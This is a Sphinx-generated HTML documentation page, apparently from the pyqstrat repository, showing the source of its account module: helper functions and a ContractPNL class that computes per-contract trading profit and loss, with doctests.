"is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 952, "license_type": "no_license", "max_line_length": 70, "num_lines": 33, "path": "/main/migrations/0005_auto_20210113_2133.py", "repo_name": "furkhan26/Ecommer-website--django", "src_encoding": "UTF-8", "text": "# Generated by Django 3.1.5 on 2021-01-13 16:03\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('main', '0004_auto_20210103_1637'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='cartdetails',\n name='id_cart',\n field=models.AutoField(primary_key=True, serialize=False),\n ),\n migrations.AlterField(\n model_name='orderdetails',\n name='id_order',\n field=models.AutoField(primary_key=True, serialize=False),\n ),\n migrations.AlterField(\n model_name='shippingdetails',\n name='id_shipping',\n field=models.AutoField(primary_key=True, serialize=False),\n ),\n migrations.AlterField(\n model_name='shippingdetails',\n name='phone_no',\n field=models.IntegerField(blank=True, null=True),\n ),\n ]\n" }, { "alpha_fraction": 0.5646123290061951, "alphanum_fraction": 0.579948902130127, "avg_line_length": 41.93902587890625, "blob_id": "135c061eb6ed7dd46e2277279556decb0ecd7d10", "content_id": "33e3162c7ebca01db94a0f4d66ef724dde1afab6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3521, "license_type": "no_license", "max_line_length": 125, "num_lines": 82, "path": "/main/migrations/0003_auto_20210103_1607.py", "repo_name": "furkhan26/Ecommer-website--django", "src_encoding": "UTF-8", "text": "# Generated by Django 3.1.4 on 2021-01-03 10:37\n\nfrom django.conf import settings\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('main', '0002_products_slug'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='CartDetails',\n fields=[\n ('id_cart', models.IntegerField(primary_key=True, serialize=False)),\n ('date_cart', models.DateTimeField(auto_now=True)),\n ('customer_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),\n ],\n ),\n migrations.CreateModel(\n name='OrderDetails',\n fields=[\n ('id_order', models.IntegerField(primary_key=True, serialize=False)),\n ('total_items', models.CharField(blank=True, 
max_length=120, null=True)),\n ('total_price', models.CharField(blank=True, max_length=60, null=True)),\n ('date_ordered', models.DateTimeField(auto_now=True)),\n ('cart_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='main.cartdetails')),\n ('customer_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),\n ],\n ),\n migrations.AlterField(\n model_name='products',\n name='brand',\n field=models.CharField(blank=True, max_length=100, null=True),\n ),\n migrations.AlterField(\n model_name='products',\n name='category',\n field=models.CharField(blank=True, max_length=100, null=True),\n ),\n migrations.AlterField(\n model_name='products',\n name='color',\n field=models.CharField(blank=True, max_length=100, null=True),\n ),\n migrations.AlterField(\n model_name='products',\n name='name',\n field=models.CharField(blank=True, max_length=100, null=True),\n ),\n migrations.AlterField(\n model_name='products',\n name='slug',\n field=models.SlugField(blank=True, max_length=200, null=True, unique=True),\n ),\n migrations.CreateModel(\n name='ShippingDetails',\n fields=[\n ('id_shipping', models.IntegerField(primary_key=True, serialize=False)),\n ('phone_no', models.IntegerField(blank=True, max_length=120, null=True)),\n ('door_no', models.CharField(blank=True, max_length=120, null=True)),\n ('address', models.CharField(blank=True, max_length=220, null=True)),\n ('city', models.CharField(blank=True, max_length=220, null=True)),\n ('pincode', models.CharField(blank=True, max_length=120, null=True)),\n ('id_order_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='main.orderdetails')),\n ],\n ),\n migrations.AddField(\n model_name='orderdetails',\n name='product_id',\n field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='main.products'),\n ),\n migrations.AddField(\n model_name='cartdetails',\n name='product_id',\n field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='main.products'),\n ),\n ]\n" }, { "alpha_fraction": 0.4904943108558655, "alphanum_fraction": 0.5494296550750732, "avg_line_length": 21.869565963745117, "blob_id": "ae3d0eeb8c1c558fd2b09152a11afd298a5f4b9c", "content_id": "7c4605abd59a105a03d4a4c20cd981cc0030601f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 526, "license_type": "no_license", "max_line_length": 47, "num_lines": 23, "path": "/main/migrations/0004_auto_20210103_1637.py", "repo_name": "furkhan26/Ecommer-website--django", "src_encoding": "UTF-8", "text": "# Generated by Django 3.1.4 on 2021-01-03 11:07\n\nfrom django.db import migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('main', '0003_auto_20210103_1607'),\n ]\n\n operations = [\n migrations.RenameField(\n model_name='cartdetails',\n old_name='customer_id',\n new_name='id_customer',\n ),\n migrations.RenameField(\n model_name='cartdetails',\n old_name='product_id',\n new_name='id_product',\n ),\n ]\n" } ]
11
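One gap worth noting in the Django project above: main/models.py imports django.utils.text.slugify but never calls it, while main/urls.py routes product-details/<str:slug>/ and views.productdetails looks products up by Products.slug. The snippet below is a hypothetical sketch, not code from this repo, of the usual way to close that gap by deriving the slug from the product name in save().

```python
# Hypothetical sketch (fields mirror the Products model above): populate
# Products.slug on first save so product-details/<str:slug>/ always matches.
from django.db import models
from django.utils.text import slugify

class Products(models.Model):
    name = models.CharField(max_length=100, null=True, blank=True)
    slug = models.SlugField(max_length=200, unique=True, null=True, blank=True)

    def save(self, *args, **kwargs):
        if not self.slug and self.name:
            self.slug = slugify(self.name)  # e.g. 'Blue Shirt' -> 'blue-shirt'
        super().save(*args, **kwargs)
```

Without something along these lines, slugs have to be entered by hand, and productdetails() raises Products.DoesNotExist for any product saved with an empty slug.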
abbass2/pyqstrat
https://github.com/abbass2/pyqstrat
6c72ef6f43940f1705a86c6239d82689087ed9be
375b3ca802b914374fe1cb58d8ff167e9fa93674
50e0fd801ddb40c112fc5692f9eb9074692ce554
refs/heads/master
2023-05-02T04:10:31.379505
2023-04-21T21:19:53
2023-04-21T21:19:53
143,200,286
352
57
BSD-3-Clause
2018-08-01T19:35:41
2023-04-14T20:11:18
2023-04-17T18:52:34
Jupyter Notebook
[ { "alpha_fraction": 0.6007212400436401, "alphanum_fraction": 0.6111816763877869, "avg_line_length": 196.1466064453125, "blob_id": "423eb9237e192e91fe666dd3c445f9027b3cd212", "content_id": "aaf3dbd04f2eee931749c4a2f337fea19ccf756e", "detected_licenses": [ "BSD-3-Clause", "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "HTML", "length_bytes": 142537, "license_type": "permissive", "max_line_length": 962, "num_lines": 723, "path": "/docs/_modules/pyqstrat/account.html", "repo_name": "abbass2/pyqstrat", "src_encoding": "UTF-8", "text": "\n<!DOCTYPE html>\n\n<html lang=\"en\">\n <head>\n <meta charset=\"utf-8\" />\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\" />\n <title>pyqstrat.account &#8212; pyqstrat 0.1.0 documentation</title>\n <link rel=\"stylesheet\" type=\"text/css\" href=\"../../_static/pygments.css\" />\n <link rel=\"stylesheet\" type=\"text/css\" href=\"../../_static/alabaster.css\" />\n <script data-url_root=\"../../\" id=\"documentation_options\" src=\"../../_static/documentation_options.js\"></script>\n <script src=\"../../_static/jquery.js\"></script>\n <script src=\"../../_static/underscore.js\"></script>\n <script src=\"../../_static/_sphinx_javascript_frameworks_compat.js\"></script>\n <script src=\"../../_static/doctools.js\"></script>\n <link rel=\"index\" title=\"Index\" href=\"../../genindex.html\" />\n <link rel=\"search\" title=\"Search\" href=\"../../search.html\" />\n \n <link rel=\"stylesheet\" href=\"../../_static/custom.css\" type=\"text/css\" />\n \n \n <meta name=\"viewport\" content=\"width=device-width, initial-scale=0.9, maximum-scale=0.9\" />\n\n </head><body>\n \n\n <div class=\"document\">\n <div class=\"documentwrapper\">\n <div class=\"bodywrapper\">\n \n\n <div class=\"body\" role=\"main\">\n \n <h1>Source code for pyqstrat.account</h1><div class=\"highlight\"><pre>\n<span></span><span class=\"c1\"># $$_ Lines starting with # $$_* autogenerated by jup_mini. 
Do not modify these</span>\n<span class=\"c1\"># $$_code</span>\n<span class=\"c1\"># $$_ %%checkall</span>\n<span class=\"kn\">from</span> <span class=\"nn\">__future__</span> <span class=\"kn\">import</span> <span class=\"n\">annotations</span>\n<span class=\"kn\">import</span> <span class=\"nn\">copy</span>\n<span class=\"kn\">from</span> <span class=\"nn\">collections</span> <span class=\"kn\">import</span> <span class=\"n\">defaultdict</span><span class=\"p\">,</span> <span class=\"n\">deque</span>\n<span class=\"kn\">from</span> <span class=\"nn\">sortedcontainers</span> <span class=\"kn\">import</span> <span class=\"n\">SortedDict</span>\n<span class=\"kn\">import</span> <span class=\"nn\">math</span>\n<span class=\"kn\">import</span> <span class=\"nn\">pandas</span> <span class=\"k\">as</span> <span class=\"nn\">pd</span>\n<span class=\"kn\">import</span> <span class=\"nn\">numpy</span> <span class=\"k\">as</span> <span class=\"nn\">np</span>\n<span class=\"kn\">from</span> <span class=\"nn\">pyqstrat.pq_types</span> <span class=\"kn\">import</span> <span class=\"n\">ContractGroup</span><span class=\"p\">,</span> <span class=\"n\">Trade</span><span class=\"p\">,</span> <span class=\"n\">Contract</span><span class=\"p\">,</span> <span class=\"n\">RoundTripTrade</span>\n<span class=\"kn\">from</span> <span class=\"nn\">pyqstrat.pq_utils</span> <span class=\"kn\">import</span> <span class=\"n\">assert_</span>\n<span class=\"kn\">from</span> <span class=\"nn\">types</span> <span class=\"kn\">import</span> <span class=\"n\">SimpleNamespace</span>\n<span class=\"kn\">from</span> <span class=\"nn\">typing</span> <span class=\"kn\">import</span> <span class=\"n\">Any</span><span class=\"p\">,</span> <span class=\"n\">Callable</span>\n<span class=\"kn\">from</span> <span class=\"nn\">collections.abc</span> <span class=\"kn\">import</span> <span class=\"n\">Sequence</span>\n<span class=\"kn\">from</span> <span class=\"nn\">pyqstrat.compute_pnl</span> <span class=\"kn\">import</span> <span class=\"n\">calc_trade_pnl</span>\n\n<span class=\"n\">NAT</span> <span class=\"o\">=</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">datetime64</span><span class=\"p\">(</span><span class=\"s1\">&#39;NaT&#39;</span><span class=\"p\">)</span>\n\n\n<div class=\"viewcode-block\" id=\"leading_nan_to_zero\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.account.leading_nan_to_zero\">[docs]</a><span class=\"k\">def</span> <span class=\"nf\">leading_nan_to_zero</span><span class=\"p\">(</span><span class=\"n\">df</span><span class=\"p\">:</span> <span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">DataFrame</span><span class=\"p\">,</span> <span class=\"n\">columns</span><span class=\"p\">:</span> <span class=\"n\">Sequence</span><span class=\"p\">[</span><span class=\"nb\">str</span><span class=\"p\">])</span> <span class=\"o\">-&gt;</span> <span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">DataFrame</span><span class=\"p\">:</span>\n <span class=\"k\">for</span> <span class=\"n\">column</span> <span class=\"ow\">in</span> <span class=\"n\">columns</span><span class=\"p\">:</span>\n <span class=\"n\">vals</span> <span class=\"o\">=</span> <span class=\"n\">df</span><span class=\"p\">[</span><span class=\"n\">column</span><span class=\"p\">]</span><span class=\"o\">.</span><span class=\"n\">values</span>\n <span class=\"n\">first_non_nan_index_</span> <span class=\"o\">=</span> <span class=\"n\">np</span><span 
class=\"o\">.</span><span class=\"n\">ravel</span><span class=\"p\">(</span><span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">nonzero</span><span class=\"p\">(</span><span class=\"o\">~</span><span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">isnan</span><span class=\"p\">(</span><span class=\"n\">vals</span><span class=\"p\">)))</span> <span class=\"c1\"># type: ignore</span>\n <span class=\"k\">if</span> <span class=\"nb\">len</span><span class=\"p\">(</span><span class=\"n\">first_non_nan_index_</span><span class=\"p\">):</span>\n <span class=\"n\">first_non_nan_index</span> <span class=\"o\">=</span> <span class=\"n\">first_non_nan_index_</span><span class=\"p\">[</span><span class=\"mi\">0</span><span class=\"p\">]</span>\n <span class=\"k\">else</span><span class=\"p\">:</span>\n <span class=\"n\">first_non_nan_index</span> <span class=\"o\">=</span> <span class=\"o\">-</span><span class=\"mi\">1</span>\n\n <span class=\"k\">if</span> <span class=\"n\">first_non_nan_index</span> <span class=\"o\">&gt;</span> <span class=\"mi\">0</span> <span class=\"ow\">and</span> <span class=\"n\">first_non_nan_index</span> <span class=\"o\">&lt;</span> <span class=\"nb\">len</span><span class=\"p\">(</span><span class=\"n\">vals</span><span class=\"p\">):</span>\n <span class=\"n\">vals</span><span class=\"p\">[:</span><span class=\"n\">first_non_nan_index</span><span class=\"p\">]</span> <span class=\"o\">=</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">nan_to_num</span><span class=\"p\">(</span><span class=\"n\">vals</span><span class=\"p\">[:</span><span class=\"n\">first_non_nan_index</span><span class=\"p\">])</span>\n <span class=\"n\">df</span><span class=\"p\">[</span><span class=\"n\">column</span><span class=\"p\">]</span> <span class=\"o\">=</span> <span class=\"n\">vals</span>\n <span class=\"k\">return</span> <span class=\"n\">df</span></div>\n\n\n<div class=\"viewcode-block\" id=\"find_last_non_nan_index\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.account.find_last_non_nan_index\">[docs]</a><span class=\"k\">def</span> <span class=\"nf\">find_last_non_nan_index</span><span class=\"p\">(</span><span class=\"n\">array</span><span class=\"p\">:</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">ndarray</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"nb\">int</span><span class=\"p\">:</span>\n <span class=\"n\">i</span> <span class=\"o\">=</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">nonzero</span><span class=\"p\">(</span><span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">isfinite</span><span class=\"p\">(</span><span class=\"n\">array</span><span class=\"p\">))[</span><span class=\"mi\">0</span><span class=\"p\">]</span>\n <span class=\"k\">if</span> <span class=\"nb\">len</span><span class=\"p\">(</span><span class=\"n\">i</span><span class=\"p\">):</span> <span class=\"k\">return</span> <span class=\"n\">i</span><span class=\"p\">[</span><span class=\"o\">-</span><span class=\"mi\">1</span><span class=\"p\">]</span>\n <span class=\"k\">return</span> <span class=\"mi\">0</span></div>\n\n\n<div class=\"viewcode-block\" id=\"find_index_before\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.account.find_index_before\">[docs]</a><span class=\"k\">def</span> <span class=\"nf\">find_index_before</span><span class=\"p\">(</span><span class=\"n\">sorted_dict</span><span 
class=\"p\">:</span> <span class=\"n\">SortedDict</span><span class=\"p\">,</span> <span class=\"n\">key</span><span class=\"p\">:</span> <span class=\"n\">Any</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"nb\">int</span><span class=\"p\">:</span>\n <span class=\"sd\">&#39;&#39;&#39;</span>\n<span class=\"sd\"> Find index of the first key in a sorted dict that is less than or equal to the key passed in.</span>\n<span class=\"sd\"> If the key is less than the first key in the dict, return -1</span>\n<span class=\"sd\"> &#39;&#39;&#39;</span>\n <span class=\"n\">size</span> <span class=\"o\">=</span> <span class=\"nb\">len</span><span class=\"p\">(</span><span class=\"n\">sorted_dict</span><span class=\"p\">)</span>\n <span class=\"k\">if</span> <span class=\"ow\">not</span> <span class=\"n\">size</span><span class=\"p\">:</span> <span class=\"k\">return</span> <span class=\"o\">-</span><span class=\"mi\">1</span>\n <span class=\"n\">i</span> <span class=\"o\">=</span> <span class=\"n\">sorted_dict</span><span class=\"o\">.</span><span class=\"n\">bisect_left</span><span class=\"p\">(</span><span class=\"n\">key</span><span class=\"p\">)</span>\n <span class=\"k\">if</span> <span class=\"n\">i</span> <span class=\"o\">==</span> <span class=\"n\">size</span><span class=\"p\">:</span> <span class=\"k\">return</span> <span class=\"n\">size</span> <span class=\"o\">-</span> <span class=\"mi\">1</span>\n <span class=\"k\">if</span> <span class=\"n\">sorted_dict</span><span class=\"o\">.</span><span class=\"n\">keys</span><span class=\"p\">()[</span><span class=\"n\">i</span><span class=\"p\">]</span> <span class=\"o\">!=</span> <span class=\"n\">key</span><span class=\"p\">:</span>\n <span class=\"k\">return</span> <span class=\"n\">i</span> <span class=\"o\">-</span> <span class=\"mi\">1</span>\n <span class=\"k\">return</span> <span class=\"n\">i</span></div>\n\n\n<div class=\"viewcode-block\" id=\"ContractPNL\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.account.ContractPNL\">[docs]</a><span class=\"k\">class</span> <span class=\"nc\">ContractPNL</span><span class=\"p\">:</span>\n <span class=\"sd\">&#39;&#39;&#39;Computes pnl for a single contract over time given trades and market data</span>\n<span class=\"sd\"> &gt;&gt;&gt; from pyqstrat.pq_types import MarketOrder</span>\n<span class=\"sd\"> &gt;&gt;&gt; ContractGroup.clear()</span>\n<span class=\"sd\"> &gt;&gt;&gt; Contract.clear()</span>\n<span class=\"sd\"> &gt;&gt;&gt; aapl_cg = ContractGroup.create(&#39;AAPL&#39;)</span>\n<span class=\"sd\"> &gt;&gt;&gt; aapl_contract = Contract.create(&#39;AAPL&#39;, contract_group=aapl_cg)</span>\n<span class=\"sd\"> &gt;&gt;&gt; timestamps = np.arange(np.datetime64(&#39;2018-01-01&#39;), np.datetime64(&#39;2018-01-04&#39;))</span>\n<span class=\"sd\"> &gt;&gt;&gt; def get_price(contract, timestamps, idx, strategy_context):</span>\n<span class=\"sd\"> ... assert contract.symbol == &#39;AAPL&#39;, f&#39;unknown contract: {contract}&#39;</span>\n<span class=\"sd\"> ... 
return idx + 10.1</span>\n\n<span class=\"sd\"> &gt;&gt;&gt; contract_pnl = ContractPNL(aapl_contract, timestamps, get_price, SimpleNamespace()) </span>\n<span class=\"sd\"> &gt;&gt;&gt; trade_5 = Trade(aapl_contract, MarketOrder(aapl_contract, timestamps[1], 20), timestamps[2], 10, 16.2)</span>\n<span class=\"sd\"> &gt;&gt;&gt; trade_6 = Trade(aapl_contract, MarketOrder(aapl_contract, timestamps[1], -20), timestamps[2], -10, 16.5)</span>\n<span class=\"sd\"> &gt;&gt;&gt; trade_7 = Trade(aapl_contract, MarketOrder(aapl_contract, timestamps[1], -20), timestamps[2], -10, 16.5)</span>\n<span class=\"sd\"> &gt;&gt;&gt; contract_pnl._add_trades([trade_5, trade_6])</span>\n<span class=\"sd\"> &gt;&gt;&gt; contract_pnl._add_trades([trade_7])</span>\n<span class=\"sd\"> &gt;&gt;&gt; df = contract_pnl.df()</span>\n<span class=\"sd\"> &gt;&gt;&gt; assert (len(df == 1))</span>\n<span class=\"sd\"> &gt;&gt;&gt; row = df.iloc[0]</span>\n<span class=\"sd\"> &gt;&gt;&gt; assert row.to_dict() == {&#39;symbol&#39;: &#39;AAPL&#39;,</span>\n<span class=\"sd\"> ... &#39;timestamp&#39;: pd.Timestamp(&#39;2018-01-03 00:00:00&#39;),</span>\n<span class=\"sd\"> ... &#39;position&#39;: -10,</span>\n<span class=\"sd\"> ... &#39;price&#39;: 12.1,</span>\n<span class=\"sd\"> ... &#39;unrealized&#39;: 44.0,</span>\n<span class=\"sd\"> ... &#39;realized&#39;: 3.000000000000007,</span>\n<span class=\"sd\"> ... &#39;commission&#39;: 0.0,</span>\n<span class=\"sd\"> ... &#39;fee&#39;: 0.0,</span>\n<span class=\"sd\"> ... &#39;net_pnl&#39;: 47.00000000000001}</span>\n<span class=\"sd\"> &#39;&#39;&#39;</span>\n <span class=\"k\">def</span> <span class=\"fm\">__init__</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"p\">,</span> \n <span class=\"n\">contract</span><span class=\"p\">:</span> <span class=\"n\">Contract</span><span class=\"p\">,</span> \n <span class=\"n\">account_timestamps</span><span class=\"p\">:</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">ndarray</span><span class=\"p\">,</span> \n <span class=\"n\">price_function</span><span class=\"p\">:</span> <span class=\"n\">Callable</span><span class=\"p\">[[</span><span class=\"n\">Contract</span><span class=\"p\">,</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">ndarray</span><span class=\"p\">,</span> <span class=\"nb\">int</span><span class=\"p\">,</span> <span class=\"n\">SimpleNamespace</span><span class=\"p\">],</span> <span class=\"nb\">float</span><span class=\"p\">],</span>\n <span class=\"n\">strategy_context</span><span class=\"p\">:</span> <span class=\"n\">SimpleNamespace</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"kc\">None</span><span class=\"p\">:</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">contract</span> <span class=\"o\">=</span> <span class=\"n\">contract</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">_price_function</span> <span class=\"o\">=</span> <span class=\"n\">price_function</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">strategy_context</span> <span class=\"o\">=</span> <span class=\"n\">strategy_context</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">_account_timestamps</span> <span class=\"o\">=</span> <span class=\"n\">account_timestamps</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">_trade_pnl</span> <span class=\"o\">=</span> 
<span class=\"n\">SortedDict</span><span class=\"p\">()</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">_net_pnl</span> <span class=\"o\">=</span> <span class=\"n\">SortedDict</span><span class=\"p\">()</span>\n <span class=\"c1\"># Store trades that are not offset so when new trades come in we can offset against these to calc pnl</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">open_qtys</span> <span class=\"o\">=</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">empty</span><span class=\"p\">(</span><span class=\"mi\">0</span><span class=\"p\">,</span> <span class=\"n\">dtype</span><span class=\"o\">=</span><span class=\"nb\">int</span><span class=\"p\">)</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">open_prices</span> <span class=\"o\">=</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">empty</span><span class=\"p\">(</span><span class=\"mi\">0</span><span class=\"p\">,</span> <span class=\"n\">dtype</span><span class=\"o\">=</span><span class=\"nb\">float</span><span class=\"p\">)</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">first_trade_timestamp</span><span class=\"p\">:</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">datetime64</span> <span class=\"o\">|</span> <span class=\"kc\">None</span> <span class=\"o\">=</span> <span class=\"kc\">None</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">final_pnl</span> <span class=\"o\">=</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">nan</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">new_trades_added</span> <span class=\"o\">=</span> <span class=\"kc\">False</span>\n \n <span class=\"k\">def</span> <span class=\"nf\">_add_trades</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"p\">,</span> <span class=\"n\">trades</span><span class=\"p\">:</span> <span class=\"n\">Sequence</span><span class=\"p\">[</span><span class=\"n\">Trade</span><span class=\"p\">])</span> <span class=\"o\">-&gt;</span> <span class=\"kc\">None</span><span class=\"p\">:</span>\n <span class=\"sd\">&#39;&#39;&#39;</span>\n<span class=\"sd\"> Args:</span>\n<span class=\"sd\"> trades: Must be sorted by timestamp</span>\n<span class=\"sd\"> &#39;&#39;&#39;</span>\n <span class=\"k\">if</span> <span class=\"ow\">not</span> <span class=\"nb\">len</span><span class=\"p\">(</span><span class=\"n\">trades</span><span class=\"p\">):</span> <span class=\"k\">return</span>\n <span class=\"n\">timestamps</span> <span class=\"o\">=</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">unique</span><span class=\"p\">([</span><span class=\"n\">trade</span><span class=\"o\">.</span><span class=\"n\">timestamp</span> <span class=\"k\">for</span> <span class=\"n\">trade</span> <span class=\"ow\">in</span> <span class=\"n\">trades</span><span class=\"p\">])</span>\n <span class=\"k\">if</span> <span class=\"nb\">len</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">_trade_pnl</span><span class=\"p\">):</span>\n <span class=\"n\">prev_max_timestamp</span><span class=\"p\">,</span> <span class=\"n\">_</span> <span class=\"o\">=</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">_trade_pnl</span><span class=\"o\">.</span><span 
class=\"n\">peekitem</span><span class=\"p\">(</span><span class=\"o\">-</span><span class=\"mi\">1</span><span class=\"p\">)</span>\n <span class=\"n\">assert_</span><span class=\"p\">(</span><span class=\"n\">timestamps</span><span class=\"p\">[</span><span class=\"mi\">0</span><span class=\"p\">]</span> <span class=\"o\">&gt;=</span> <span class=\"n\">prev_max_timestamp</span><span class=\"p\">,</span>\n <span class=\"sa\">f</span><span class=\"s1\">&#39;Trades can only be added with non-decreasing timestamps current: </span><span class=\"si\">{</span><span class=\"n\">timestamps</span><span class=\"p\">[</span><span class=\"mi\">0</span><span class=\"p\">]</span><span class=\"si\">}</span><span class=\"s1\"> prev max: </span><span class=\"si\">{</span><span class=\"n\">prev_max_timestamp</span><span class=\"si\">}</span><span class=\"s1\">&#39;</span><span class=\"p\">)</span>\n \n <span class=\"k\">if</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">first_trade_timestamp</span> <span class=\"ow\">is</span> <span class=\"kc\">None</span><span class=\"p\">:</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">first_trade_timestamp</span> <span class=\"o\">=</span> <span class=\"n\">timestamps</span><span class=\"p\">[</span><span class=\"mi\">0</span><span class=\"p\">]</span>\n \n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">new_trades_added</span> <span class=\"o\">=</span> <span class=\"kc\">True</span>\n \n <span class=\"k\">for</span> <span class=\"n\">i</span><span class=\"p\">,</span> <span class=\"n\">timestamp</span> <span class=\"ow\">in</span> <span class=\"nb\">enumerate</span><span class=\"p\">(</span><span class=\"n\">timestamps</span><span class=\"p\">):</span>\n <span class=\"n\">t_trades</span> <span class=\"o\">=</span> <span class=\"p\">[</span><span class=\"n\">trade</span> <span class=\"k\">for</span> <span class=\"n\">trade</span> <span class=\"ow\">in</span> <span class=\"n\">trades</span> <span class=\"k\">if</span> <span class=\"n\">trade</span><span class=\"o\">.</span><span class=\"n\">timestamp</span> <span class=\"o\">==</span> <span class=\"n\">timestamp</span><span class=\"p\">]</span>\n <span class=\"n\">open_qtys</span><span class=\"p\">,</span> <span class=\"n\">open_prices</span><span class=\"p\">,</span> <span class=\"n\">realized_chg</span> <span class=\"o\">=</span> <span class=\"n\">calc_trade_pnl</span><span class=\"p\">(</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">open_qtys</span><span class=\"p\">,</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">open_prices</span><span class=\"p\">,</span> \n <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">array</span><span class=\"p\">([</span><span class=\"n\">trade</span><span class=\"o\">.</span><span class=\"n\">qty</span> <span class=\"k\">for</span> <span class=\"n\">trade</span> <span class=\"ow\">in</span> <span class=\"n\">t_trades</span><span class=\"p\">],</span> <span class=\"n\">dtype</span><span class=\"o\">=</span><span class=\"nb\">int</span><span class=\"p\">),</span> \n <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">array</span><span class=\"p\">([</span><span class=\"n\">trade</span><span class=\"o\">.</span><span class=\"n\">price</span> <span class=\"k\">for</span> <span class=\"n\">trade</span> <span class=\"ow\">in</span> <span class=\"n\">t_trades</span><span class=\"p\">],</span> 
<span class=\"n\">dtype</span><span class=\"o\">=</span><span class=\"nb\">float</span><span class=\"p\">),</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">contract</span><span class=\"o\">.</span><span class=\"n\">multiplier</span><span class=\"p\">)</span>\n \n <span class=\"n\">open_qty</span> <span class=\"o\">=</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">sum</span><span class=\"p\">(</span><span class=\"n\">open_qtys</span><span class=\"p\">)</span>\n <span class=\"k\">if</span> <span class=\"n\">open_qty</span> <span class=\"o\">==</span> <span class=\"mi\">0</span><span class=\"p\">:</span>\n <span class=\"n\">weighted_avg_price</span> <span class=\"o\">=</span> <span class=\"mi\">0</span>\n <span class=\"k\">else</span><span class=\"p\">:</span>\n <span class=\"n\">weighted_avg_price</span> <span class=\"o\">=</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">sum</span><span class=\"p\">(</span><span class=\"n\">open_qtys</span> <span class=\"o\">*</span> <span class=\"n\">open_prices</span><span class=\"p\">)</span> <span class=\"o\">/</span> <span class=\"n\">open_qty</span>\n \n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">open_qtys</span> <span class=\"o\">=</span> <span class=\"n\">open_qtys</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">open_prices</span> <span class=\"o\">=</span> <span class=\"n\">open_prices</span>\n <span class=\"n\">position_chg</span> <span class=\"o\">=</span> <span class=\"nb\">sum</span><span class=\"p\">([</span><span class=\"n\">trade</span><span class=\"o\">.</span><span class=\"n\">qty</span> <span class=\"k\">for</span> <span class=\"n\">trade</span> <span class=\"ow\">in</span> <span class=\"n\">t_trades</span><span class=\"p\">])</span>\n <span class=\"n\">commission_chg</span> <span class=\"o\">=</span> <span class=\"nb\">sum</span><span 